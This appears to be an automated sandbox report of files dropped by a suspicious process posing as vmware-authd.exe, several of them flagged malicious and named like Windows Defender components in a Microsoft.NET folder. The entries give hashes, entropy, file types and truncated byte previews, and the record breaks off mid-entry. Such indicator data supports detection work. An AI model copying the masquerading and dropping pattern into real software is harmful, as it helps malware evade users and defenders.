SSDEEP:	3072:/+V443d04OzmE9ww+vKTebKJy5zeWKGo3:/+V443d05n9rwKw5zNQ
MD5:	5020E4A4321476F7DE557F75CBC87438
SHA1:	6F135DE3D7A2FF90AF6401E5C01FCC282B0A4108
SHA-256:	41E3B40B6B8472380568BCF75FB493515DBAF63BF948F9DA9267F459D422F78F
SHA-512:	7AA722B45373F82F5ED8F6559D149E3DD72A00CB942D39BA2B0F584FF6FABFB62B1A0A52195298389CB2C698DA4E62F2D78DDE2DF46FF1183BA0F2118A2297C5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ql>}..P...P...P..u....P.^uS/..P.^uT/..P...Q...P.^uQ/..P.^uU/..P.^uP/..P.^uX/:.P.^u....P.^uR/..P.Rich..P.........................PE..d................." ...........................e....................................3.....`A................................................4........P.......@..d.......h%...p......0...p.......................(.......@............................................text............................... ..`.rdata...e.......p..................@..@.data...@.... ... ... ..............@....pdata..d....@.......@..............@..@.rsrc........P... ...P..............@..@.reloc.......p.......p..............@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	128376
Entropy (8bit):	5.778415627793409
Encrypted:	false
SSDEEP:	3072:svVXrm01KTBVOm81W0z3J8EfKTee1YzFw/x65B:svBjiBVOmGJJ0kFaw3
MD5:	2C2714BAB4E11FD6865DDF8B501A212D
SHA1:	9B5D52CB7A6CF62B83A36566DEAD2C28B0D1A96E
SHA-256:	0C60E5D6BB49E1F85DEA4305BCB2308708A11A8A2C228D0C1F3F41BE79AF09C2
SHA-512:	73ECA7073D9ECB8015C23E494D948C1D50A32CF96D2E0190D08FD48A69F725DCE35D2A6506FAF037FB42405A55DBF22A7776068BD30811721AC086C04A65001C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]P...P...P......Q.......].......W...Y.B.@...............]...P...d.............Q......Q...RichP...................PE..d...../..........."............................@............................................................................................tj.......... ...............x%......`....<..p....................$..(...."..8...........@$...............................text...R........................... ..`.rdata...Y... ...`... ..............@..@.data...............................@....pdata........... ..................@..@.rsrc... ...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21776
Entropy (8bit):	4.731417909543677
Encrypted:	false
SSDEEP:	192:7rFQWgZHWAALc2Fu462TNbvRpSDBQABJw5Wayks9gICQX01k9z3AbwmN:7rFQWgZHWA1MJ16DBRJwLy/P/R9zlmN
MD5:	0613DECA278E353EBC96493895754CCE
SHA1:	D72682AE6E077DE106235D9C236B2C7F744E2DBC
SHA-256:	D84E4315C6121FA8F8D4D477FF8C70AC899EC29CF7EE10CCD1BE1A01E7E57D9E
SHA-512:	275A7A398EA6DA4284489C437D8EB0FFA3C7FEAA299235AF92CF3E8AFB78E5487337F4B5C7544C9CFBC2AAE90BAEFDF02417C6E9125BE8BA98902464AD766CD9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d...a.n..........." ......... ...............................................0...........`A......................................................... ...............0...%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21856
Entropy (8bit):	4.482734780628967
Encrypted:	false
SSDEEP:	192:nrWNzOWPicCroDBQABJ54pZMMBdRgjLX01k9z3AzslM1Y3qq:rWNzOWPbDBRJGTleLR9zusloYZ
MD5:	9EEE260CF0F752D4595E51AF7EBD8B6A
SHA1:	1544C414D1240AC4F8FED45551EA061CD4665721
SHA-256:	49FA47F6F2444DC2235813961ED8395D04F86B9DF3EA08882BFFED4EAD3502F4
SHA-512:	27EDB26E104294A9DB70A4B58930220694E877DF808D4838DBDC2516BAEB5BF996C759446BE18855F52D424CDB3B5BFDD26B64B087AF167ABD661FC7C5CAEE17
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d................." ......... ...............................................0......7.....`.......................................................... .. ............0..`%..............T............................................................................rdata..............................@..@.rsrc... .... ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\NisSrv.exe

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2909208
Entropy (8bit):	6.442167136448819
Encrypted:	false
SSDEEP:	49152:LJlKh3CsTiIy0vAayl+xFJCPg3gUZ/RG6XICg:DIPlIn
MD5:	852AAE2F9F2F13FD6AECC1E1817D8BF1
SHA1:	548C65353A1A7ACFA4CCF72F94571FEEB533AB44
SHA-256:	6BFE5B785D96525C9F060474837A83434E9EEAB498A07396C5EDB7EA925BF8B9
SHA-512:	3A7F1D8FD4D0D779383697632E3B00B803E510719AA80130337EFA7C6AB94418C3DD1315B866D4E9B2F4028777DE1229B1BD8057129C89D2778DEF1F465F95D2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.C............C\|......C\|.......{.......{.......{.......q;..............{.......{U.............C\|..i...C\|W.....C\|......Rich............................PE..d....v............".......#..........."........@..............................-.......-...`..................................................X).,.....,.H....@+.dU....+.......,..1..0.%.p....................$.(.....$.8.............$.@....N)......................text.....#.......#................. ..`.rdata...{....$.......$.............@..@.data...p.....).......).............@....pdata..dU...@+..`... *.............@..@.didat........,.......+.............@....rsrc...H.....,.......+.............@..@.reloc...1....,..@....+.............@..B................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	738576
Entropy (8bit):	6.022878886310737
Encrypted:	false
SSDEEP:	12288:iQo3VmVdaveWcQRUtwywRXT349/gehVTef1YecoFW3h07EVd:U4VdamQRamXGef63ou0EVd
MD5:	CFC96445CC630E00935A8A74875BD45C
SHA1:	5572055932156EA9F569ACB1CFC0E714373765D6
SHA-256:	D132DE7BFAFDA6F0A9CFA4A829892FBA6C531D721C4A1BA9918BD5553BA0336B
SHA-512:	92E737A59BE464ADB5152C4406E76578CC70FECE2E58EAA845A654A1A70BBDBF7EB57B3079179C8666944111FEEB59E3D54F0CDC61B7F5639BEC62D31B851B46
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)m.m...m...m....y..l....y..o...~..\|...m.......~..w...~..c...~......y..l....y.......yG.l....y..l...Richm...................PE..d......+.........." .....p..................................................@............`A............................................................X....p..(P... ...%......,H..<...p.......................(.......8...................D........................text....d.......p.................. ..`.rdata...S.......`..................@..@.data...D........p..................@....pdata..(P...p...`...P..............@..@.didat..............................@....rsrc...X...........................@..@.reloc..,H.......P..................@..B........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.mof

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with very long lines (4929), with CRLF line terminators
Category:	dropped
Size (bytes):	94958
Entropy (8bit):	3.592146871128743
Encrypted:	false
SSDEEP:	768:hvQJc7QeBhFbUAbYzlyZCvQJc7QeBhFbUAbYzlyZg:uMbgyLMbgya
MD5:	4B23206905E11134BEB571548C245F3C
SHA1:	3E0AE50991CD2422E1C2FDCC9C6F6DF8EAB18FEC
SHA-256:	2CF7F8EF415A75427E90C50BC18BF5FBE25398A3E805A08F0DA5DEEB48C7CCA1
SHA-512:	9A758F7C1BC185EDE944CDC6A12B2664F5A1EBC31623FE40C469E317199D5A93E8CCB786042C4012D3ED3D57E271C853D60019D516BA399430ACEBD4BE938E5D
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........I.n.s.t.a.n.c.e. .o.f. ._._.W.i.n.3.2.P.r.o.v.i.d.e.r. .a.s. .$.p.r.o.v.....{..... . .N.a.m.e. .=. .".P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.".;..... . .C.l.s.I.d. .=. .".{.A.7.C.4.5.2.E.F.-.8.E.9.F.-.4.2.E.B.-.9.F.2.B.-.2.4.5.6.1.3.C.A.0.D.C.9.}.".;..... . .I.m.p.e.r.s.o.n.a.t.i.o.n.L.e.v.e.l. .=. .1.;..... . .H.o.s.t.i.n.g.M.o.d.e.l. .=. .".L.o.c.a.l.S.e.r.v.i.c.e.H.o.s.t.".;..... . .v.e.r.s.i.o.n. .=. .1.0.7.3.7.4.1.8.2.5.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.M.e.t.h.o.d.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.E.v.e.n.t.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;..... . .e.v.e.n.t.Q.u.e.r.y.L.i.s.t. .=. .{.".s.e.l.e.c.t. .*. .f.r.o.m. .M.S.F.T._.M.p.E.v.e.n.t.".}.;...

C:\Program Files (x86)\Microsoft.NET\ProtectionManagement_Uninstall.mof

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	2664
Entropy (8bit):	3.464075447819169
Encrypted:	false
SSDEEP:	24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzSJjWvlDQzfWvlDQzyWU:eTjDGwJ3SJnr24RFZ7a2la2Sa2mWaWP
MD5:	C4E26C53F76774E091FEE17FFFF64414
SHA1:	5CB3AD07CF6DFF3DB5BAAD55488A769A664BC093
SHA-256:	5172863C41E84024799B2034D42F10E9720FC53171A4F6C1CA2FDB2C6F71DFE9
SHA-512:	635DE182629A248B9BF3061E1A1C1D3ED904B8843187B64CEB3BF96DD4B10769D9E001EAEECED2179350F7012C82317B2C833A8501FF9C92D1A0CE94C711FEBB
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.R.o.l.l.b.a.c.k.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.

C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	165208
Entropy (8bit):	7.110142692986595
Encrypted:	false
SSDEEP:	3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
MD5:	EBEA28C15DD26C1D0C1944215F0AAE8B
SHA1:	98375B311B8D56DA260961217073B30D1AEFE089
SHA-256:	E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
SHA-512:	05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d......W.........." .........P...............................................`............`.......................................................... ...<...........`..X%..............T............................................................................rdata..............................@..@.rsrc....<... ...@... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	403816
Entropy (8bit):	6.1451106536127735
Encrypted:	false
SSDEEP:	6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
MD5:	FBAA9986931D1ADEDA07A6EF8F04AB6D
SHA1:	5FB959351940EB94EEF9D8E21D95436B77FEB9A2
SHA-256:	3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
SHA-512:	A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.u.3..,3..,3..,'..-1..,V..-2..,V..-2..,'..-9..,'..-!..,:.,!..,'..-...,V..-&..,3..,...,'..-]..,'..,2..,'..-2..,Rich3..,........................PE..L.....,......................L.......H............@..........................@.......Q........... ..............................\|....0..................h/......,F.....T...........................H...........................`....................text............................... ..`.data....).......$..................@....idata... ......."..................@..@.didat..(.... ......................@....rsrc........0......................@..@.reloc..,F.......H..................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25936
Entropy (8bit):	4.328275985676387
Encrypted:	false
SSDEEP:	192:9+DWgAHWglQBEKLO0cCroDBQABJFI6eYIN5vCX01k9z3AzfSXDlG6P:cWgAHWtBEJlDBRJeWUJCR9zUwDM6P
MD5:	4A8B58C88DF1C607A9DF21EE390CA8F8
SHA1:	18B995CA90D74D34975F9DF8E8611F35E7B94E9D
SHA-256:	1A90C01C3FD40E5CEE77F626BF9883B5D276132252E28EE4B6C2C02D9CD30E4C
SHA-512:	1ECCD6FB016C7E43FBE63120A2A43135B17453AF428658E11EFD69F753FEE5A5F227202144CE85840388E138D392F0A528450B37DE23EFE902CC467A5CD4F1DA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d....f............" .........0...............................................@............`.......................................................... ..0............@..P%..............T............................................................................rdata..............................@..@.rsrc...0.... ... ... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	587096
Entropy (8bit):	5.955146470563534
Encrypted:	false
SSDEEP:	6144:UoSVOVSccnel+Z/smH98qn3xVPNCqdeAB5l6Hv7YPdr5/NJSFiimiTVVmVVV8VVp:ULOVSpu+Viq3xnJdtn6jUFYNN
MD5:	2776A2B1C9D82F3FEBAA8CA1F5544992
SHA1:	28620B6498EEFA4E411686FEAC1C0E03D66B661D
SHA-256:	D1F81D7C43B522E39F0FD14E1C25F97E7894CEBBE1F43320CBB66BE1528A7A72
SHA-512:	2FBCA83415F5E927B38DBF7064CAAE1CD67EC2ACBA6C00AEB3520F9C8BC3B9DE46329CB57B2D1D9DC7CB33BD89766E6C8C3DC3C1FC6B3DAA885CB50FE64C5E2B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...................................................................................Rich............................PE..d...+WSF.........."..........P.................@..................................................... ...........................................................6......X%......x...TY..T......................(.......@...............`............................text...L}.......................... ..`.rdata..............................@..@.data...`Q...0...P...0..............@....pdata...6.......@..................@..@.rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\ThirdPartyNotices.txt

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	ASCII text, with very long lines (467), with CRLF line terminators
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	4.900567214358779
Encrypted:	false
SSDEEP:	24:8uSJLsnMRsAvARsADXWBDk44IuNhbgU0E+4HQk1LpsLtbY:89LsnMRsgARsqXWBDB4Tvr06H319ou
MD5:	314CE81BED1547B8FA40F405F4C8B9FC
SHA1:	6A1A717B275B90BA77A43EF77FCDEDBC7E6F7CE2
SHA-256:	00D799DC04FBDF92BC39218C22723C61C3204A82B1FC418E6AEA65E6ED111CE8
SHA-512:	143A0D92659BB088F2282BDB14F465D58EA9E0E57D261741CC9AC7B507BE730F4B0A62E9A9BF0B73BF19FDF6F44F2977E2C77875E28AC30E461155BDDB59A047
Malicious:	false
Preview:	Files originating with or related to Casablanca v2.6.0, a "Microsoft project for cloud-based client-server communication in native code using a modern asynchronous C++ API design. This project aims to help C++ developers connect to and interact with services." See https://github.com/Microsoft/cpprestsdk. This material is licensed under the terms of the Apache Software License v2.0 (see https://github.com/Microsoft/cpprestsdk/blob/master/license.txt), which state:.... ==++==.... Copyright (c) Microsoft Corporation. All rights reserved. .. Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. .. Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for

C:\Program Files (x86)\Microsoft.NET\bin.zip

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	8907083
Entropy (8bit):	7.992524649079719
Encrypted:	true
SSDEEP:	196608:sL/pb5vj/q8cFmGRouNMASrmNOpzEPbL56gRLDhbPihv:6h5vD0JRTPux4ZLsR
MD5:	2335C2C4BD529977B4528EB61BA9669E
SHA1:	87521525E0B8F941FFF9175F9DA3DA408E45BAE3
SHA-256:	688D9B837F6DD317326A3DBF3EEECBABDCB75EA8AD70AD2C55620B64627B9E0C
SHA-512:	0120AA5CF488637CDEAD66B2C3636E5A685B85562935C982D079AAD008E67000BD5D1918D9C1F3C03C086850F4F8E5680500AE23BAFF28FADE83D69E6568CBEA
Malicious:	false
Preview:	PK........e..T.u.bp..PE......AMMonitoringProvider.dll.Z{xTE..~..!inc.. ..:.0d"-..2_7$K5.h..0 ..00$...a....l.......e..>..qd1.;....cP.8..vl......=...G......n.n..y.S.n'.p31.B..(.!UD-n..%.........GU..f-]..^R...e.>a/zt...>....e...e....?.bqq....a..^LG7E..g.j\....Kx...^\|....oo\......8...hR....eEK./kA.!..=...+.D...h{.~..B. ....>..Xxs..O...x.2...4#.o.G..J..U1...d...v#...lNAa...V4...d..].!......,...d,....V...u..a.........i..:^.,.,[...QB..CX.&....\|......7jX.=.B.%!.M.......,+"D....f....E...m.....T.W.J_.+}......W.J_.+}..cZ)..g.....4hN.VGZ...Xo.g-7...`.=....iP..zBe.....@....T..k.I.....C#...-.{..;.w..........C....4Z.....]rkS.k.......n.:..MA.@...Z..{F..>B....F...&G...87..;..Y@>q....z.s7^.Ezd.Y>.A....m.@$...)'`~.$..@F...Z.~......N}F..w._..7O...zR....)..$eQ....e..4G...q"......z"..%h.R.......H8..'u.B....~..T....Bh..s./....D.@.T..l.......A...&O..c85..8.#.....s.~......D.k.4m..........wqe..'.b2...o.o:.e..Wq..p>...Pq.....&.p.9N-...qj4.6[.gG.G...6..

C:\Program Files (x86)\Microsoft.NET\bin01.zip

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	data
Category:	dropped
Size (bytes):	142
Entropy (8bit):	6.55447018279355
Encrypted:	false
SSDEEP:	3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
MD5:	57A37BD0840D0745A9481BCC25B5A792
SHA1:	E8B7C744981C0713DE5EBB308897EFCBD374FD11
SHA-256:	E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
SHA-512:	08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
Malicious:	false
Preview:	H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.

C:\Program Files (x86)\Microsoft.NET\binc.zip

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	8907083
Entropy (8bit):	7.99997851317994
Encrypted:	true
SSDEEP:	196608:3XxOUkDXhY9oRT+OZFCkEj19es+H8UPqrvXIJcC+nkItsX+qOPB0:3XoX290+6yhQbTTIy8B0
MD5:	C89C700FA943B468B7DE3BC145D06848
SHA1:	EDF217A82AF64D1D9347D90C41C38A9262E1596C
SHA-256:	7A85B962D904F82AFD8D2DB6FF0760D761978FF09C0BF1D40287C6ED630A9130
SHA-512:	76C6E606AF8C05DEB74FEC92F95105BCFCFBC6B6D65A104B35BD38D87296B91203F91164B6D536660CE8594F3653C1AD8791EA026A776F92D91EAC58CE21743B
Malicious:	false
Preview:	..''....H..i..E.Dh.&e.a...6....#....+oS.....F.ve.Gs....UQ...hL.E......a...dt...=.H7.X......-.&N..n.;.....fxAI........h..0..<J......]...by._..fb.. ....7..&....Y<S~...9......3u.v..._.Jnq.. .a....<....\|......K.$..(tei.\|..Y_/L..P...G)...LUD-....(..}.........9..v...:...O.Q8.../1.8.3).p.TA..7.....?.3e....e.........}.8<+...3?....>....<.H.!..s..J..~.W.~.-.o. ..Z<.s........W.+...JT<...}.T.rz..,.i.y.....}.tc....z.`...c.(...?..K.5.P5^..b...X.r.q.[.o'Z.8.....'.+eO..;..H......W....S,...!:.....k..]9v.^...0.#..X..9T..^.&Q... g6.1...:].KO.1....A.L.......8...-Y.y.bn......bJ.}...&...3N/.m..s.;(.l.o}z...iv..GQ....).QL...\.v......../J..#..CD0)........".L.MC...]K!..`.L..../...f..w.a.h.0.].uk.._.8`.&3..9Ff/6Deap....i7.rdj&....8..u.1..f/nswuQ....5.$....iy.:. .....I..<xM.d..9._.$.".\|.F....V..6.H...!...~..<4v..-...#Ja.d...."xS..A.....M..`.^..>.@..>z...}..K.B..._i[.....M.L.3...Ky.mL..Z$....]...%.m....Y..........1\a........y....:Q.v.KQ....".-F.4

C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	3.2580418248791343
Encrypted:	false
SSDEEP:	24:eH1GSp85gpXsFCZIN/at1IyBIZW0sTf5cnaw7ScNffz745U35WWdPfPN3Tc:ypK2BZ+W1I8IZWPTf5EdHffA5K5Ww13g
MD5:	EE08DF3A08F49B9A7239F0DE796E5DD0
SHA1:	461A532C71E6C20FB529F340CDF89DB4845200AF
SHA-256:	5959174D18270B856CF01B69223623E231AEF539F71B20336E0BE764F4C632F5
SHA-512:	7E6274FB38113EF69B132C5687EC4E08FFD09A4C1CA85B82441470D20AABBB55814E97EF8EE6DFA08A377719FB71ABA6A94F1217554C3463173AF12F93038222
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0.......\|....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....a..........l...P...P........a..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...p..uI..$f.}II...3v...~.qIp;.a..........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	50688
Entropy (8bit):	3.394595207496583
Encrypted:	false
SSDEEP:	768:QJbyt33c7EhrdTTm147vXahEzhEthEGQRQwhEfSm:QJbytHu6rdd7vM+4Ivm
MD5:	4CFEF0FE4901B062F4B169B97F8CFD31
SHA1:	3ABE261FA1E8625FE3155B0D4B98D0D5903E1E1C
SHA-256:	5A89EBF5211FE4E51ED4D5D8FE1FEEC591A67F2F1632C6C0873CB44028386F43
SHA-512:	B1D8D65B6E781019618119F71500EC082018E11DF5562C878E34E1EC54FEF770F6B9F095A10D22B550FE137F1177057B507A1845048BA170EC762AAFB21D52CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................~e....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....d...........l...P...P.......d...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..@....rsrc$02.... ....^K..8.........HQM....H..IMd...........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	3.4967857595832523
Encrypted:	false
SSDEEP:	384:ZtOioFEr4H1O/Dtkby/g1mwhqfB9hy0VkkWoBFH1ANl8CWupBW4:MBHI//1ANl8yp5
MD5:	FF86B38C73EED57883F04E1E61C3A213
SHA1:	6DD75F604393D70288AA1E28392AB83701B67650
SHA-256:	A7303F3077D7890C7CB889C7DD4A913BB0E5AB94E8DD190F258C85BF0A81AC28
SHA-512:	AAD695468C28F5E02DF5171294151BFA3A96D97203661C7278B4F2D37C167D8A6DE48A6AE9E50BCA6083A5E968497FEFC7526B2FCAB1A1F2396421A187CA798E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... .................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....D%.........l...P...P........D%.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02.... ..........f...T.e.J#.3...:.o...D%.........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8704
